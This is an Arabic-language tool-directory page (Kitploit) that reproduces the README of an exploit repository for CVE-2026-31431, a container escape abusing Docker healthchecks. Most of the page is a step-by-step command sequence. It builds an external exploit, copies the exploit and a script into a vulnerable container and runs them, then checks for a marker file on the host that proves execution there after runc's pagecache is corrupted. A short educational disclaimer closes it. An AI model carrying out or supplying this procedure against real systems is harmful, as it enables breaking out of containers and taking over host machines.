Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31431-Copy-Fail-Container-Escape — # هروب الحاوية على أي حاوية Docker مع تفعيل فحص الصحة عبر CVE-2026-31431 | Kitploit
أدوات/GitHubGitHub/hans362/cve-2026-31431-copy-fail-container-escape
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن السحابةالتعلم والتعليمالهروب من الحاوية
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

# هروب الحاوية على أي حاوية Docker مع تفعيل فحص الصحة عبر CVE-2026-31431

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
214منذ 4 أشهرلم تتم المراجعة بعد

CVE-2026-31431-Copy-Fail-Container-Escape

العرض التوضيحي

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

المتطلبات الأساسية

  • حاوية معرّضة لثغرة CVE-2026-31431
  • فحص صحة الحاوية (healthcheck) مُهيّأ وأمر الفحص معروف
  • الحصول على صلاحيات الجذر (root) داخل الحاوية (إذا لم يكن لديك، يمكنك ببساطة استخدام Copy Fail للحصول عليها)

في هذا المستودع، يتم توفير ملف docker-compose.yml لإعداد حاوية معرّضة للثغرة. يمكنك أيضاً استخدام أي حاوية معرّضة أخرى أو إعداد حاوية خاصة بك، ولكن تذكر تعديل كود الاستغلال وفقاً لذلك.

خطوات الاستغلال

root@kitploit:~
# على الجهاز المضيف
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# داخل حاوية copyfail
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# انتظر بضع دقائق حتى يتم تنفيذ فحص الصحة
# وتحقق مما إذا تم إنشاء /tmp/pwned على المضيف

# على الجهاز المضيف
ls /tmp/pwned

بمجرد نجاح الاستغلال، يتم إتلاف ذاكرة التخزين المؤقت للصفحات (pagecache) لملف runc الثنائي على الجهاز المضيف. يمكنك استعادتها عن طريق تشغيل echo 3 | sudo tee /proc/sys/vm/drop_caches على المضيف.

الاعتمادات

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

إخلاء المسؤولية

هذا المستودع مخصص للأغراض التعليمية فقط. لا ينبغي استخدامه لأي أنشطة ضارة. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذا الكود. استخدمه دائماً في بيئة خاضعة للتحكم وقانونية.

تنزيل الأداة